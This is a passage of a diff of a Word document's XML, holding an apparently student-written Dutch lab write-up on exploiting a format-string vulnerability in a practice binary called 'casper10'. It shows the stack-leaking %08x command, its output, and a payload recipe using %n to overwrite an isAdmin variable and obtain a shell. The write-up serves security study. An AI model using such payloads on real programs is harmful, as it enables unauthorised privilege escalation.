+        <w:t>.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78!</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Deze code laat een deel van de stack memory zien. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Het werkt omdat de </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>printf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">-functie 15 keer </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>4 bytes</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> van de stack opvraagt en deze </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>elk toont als een hexadecimaal getal dat bestaat uit 8 cijfers.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Dit geeft de bovenstaande output.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Door dit te doen kunnen we een deel van de stack reconstrueren.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">We zien waar de “AAAA” string </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>zich</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> in memory</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> bevind</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>, zie naar de onderlijnde bytes</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Het eerste probleem hierbij is dat deze string is opgedeeld </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">over 2 hexadecimale waarden. Maar dit is makkelijk om te lossen door voor deze string nog een </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>dummie</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> letter voor te voegen</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>b</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>ijvoorbeeld “</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>D</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>”.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Vervolgens vraag ik via </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>gdb</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> het adres op van de globale variabele </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>is</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>A</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>dmin</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Nu heb ik alle informatie om de exploit code op te bouwen. Deze code bestaat uit:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Lijstalinea"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="8"/>
+        </w:numPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">1 </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>dummie</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> letter (“D”)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Lijstalinea"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="8"/>
+        </w:numPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Adres van de </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>isAdmin</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> variabele</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Lijstalinea"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="8"/>
+        </w:numPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">6 keer de “%x” variabele om naar het begin van de </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>isAdmin</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> adres te wijzen</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Lijstalinea"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="8"/>
+        </w:numPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>“%n” om te schrijven naar de variabele</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Bovenstaande exploit gaat een waarde schrijven naar de </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>isAdmin</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> variabele. Elke positieve waarde gaat er voor zorgen om in de </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>if</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> statement te komen en vervolgens “/bin/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>xh</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>” uit te voeren.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:br w:type="page"/>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Kop3"/>
         <w:jc w:val="both"/>
         <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>Vulnerability</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Casper10 heeft een format-string </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>vulnerability</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> dat een data-</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>only</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> attack kan veroorz</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve">aken. Zowel stack </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>canaries</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> als </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>een niet uitvoerbare</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> stack zijn ingeschakeld.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Kop3"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>Exploit beschrijving</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Om deze exploit te vinden ben ik begonnen door het programma te laten crashen. Dit heb ik gedaan door middel van de volgende code: </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>casper</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve">/casper10 AAAA$(python -c 'print ".%08x"*15') </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>Deze code gaat 4 maal een “A” printen gevolgd door 15 maal “.%08x”</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Dit geeft de volgende uitvoer: </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>HelloAAAA.080486d0.bffff7d1.bffff7d1.001b023c.6c654808.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:u w:val="single"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>41</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>206f6c.2e</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:u w:val="single"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>414141</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78!</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Deze code laat een deel van de stack memory zien. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Het werkt omdat de </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>printf</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve">-functie 15 keer </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>4 bytes</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> van de stack opvraagt en deze </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>elk toont als een hexadecimaal getal dat bestaat uit 8 cijfers.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>Dit geeft de bovenstaande output.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Door dit te doen kunnen we een deel van de stack reconstrueren.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve">We zien waar de “AAAA” string </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>zich</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> in memory</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> bevind</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>, zie naar de onderlijnde bytes</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve">. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Het eerste probleem hierbij is dat deze string is opgedeeld </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve">over 2 hexadecimale waarden. Maar dit is makkelijk om te lossen door voor deze string nog een </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>dummie</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> letter voor te voegen</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>,</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>b</w:t>
-      </w:r>
-      <w:bookmarkStart w:id="13" w:name="_GoBack"/>
-      <w:bookmarkEnd w:id="13"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>ijvoorbeeld “B”.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Kop3"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="23" w:name="_Toc26704224"/>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Mitigation</w:t>
       </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-      </w:pPr>
+      <w:bookmarkEnd w:id="23"/>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="24" w:name="_GoBack"/>
+      <w:bookmarkEnd w:id="24"/>
     </w:p>
     <w:sectPr>
       <w:footerReference w:type="default" r:id="rId9"/>
@@ -7027,6 +8041,119 @@
     </w:lvl>
   </w:abstractNum>
   <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="504B0E21"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="6FB62854"/>
+    <w:lvl w:ilvl="0" w:tplc="10000001">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="10000003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="10000005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="10000001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="10000003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="10000005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="10000001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="10000003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="10000005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="6" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="547B4634"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="1000001F"/>
@@ -7112,7 +8239,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="6" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="7" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="776F3E43"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="BDB6864C"/>
@@ -7232,10 +8359,10 @@
     <w:abstractNumId w:val="2"/>
   </w:num>
   <w:num w:numId="3">
-    <w:abstractNumId w:val="5"/>
+    <w:abstractNumId w:val="6"/>
   </w:num>
   <w:num w:numId="4">
-    <w:abstractNumId w:val="6"/>
+    <w:abstractNumId w:val="7"/>
   </w:num>
   <w:num w:numId="5">
     <w:abstractNumId w:val="3"/>
@@ -7245,6 +8372,9 @@
   </w:num>
   <w:num w:numId="7">
     <w:abstractNumId w:val="1"/>
+  </w:num>
+  <w:num w:numId="8">
+    <w:abstractNumId w:val="5"/>
   </w:num>
 </w:numbering>
 </file>
@@ -8315,8 +9445,8 @@
   <w:rsids>
     <w:rsidRoot w:val="007B5ECD"/>
     <w:rsid w:val="00183736"/>
-    <w:rsid w:val="00335F65"/>
     <w:rsid w:val="003F63A5"/>
+    <w:rsid w:val="005118BD"/>
     <w:rsid w:val="007B5ECD"/>
     <w:rsid w:val="00CA0CD2"/>
     <w:rsid w:val="00DE32B4"/>
@@ -9116,7 +10246,7 @@
 </file>
 
 <file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{3D233A9C-35BD-426D-B271-C50264A2DDE3}">
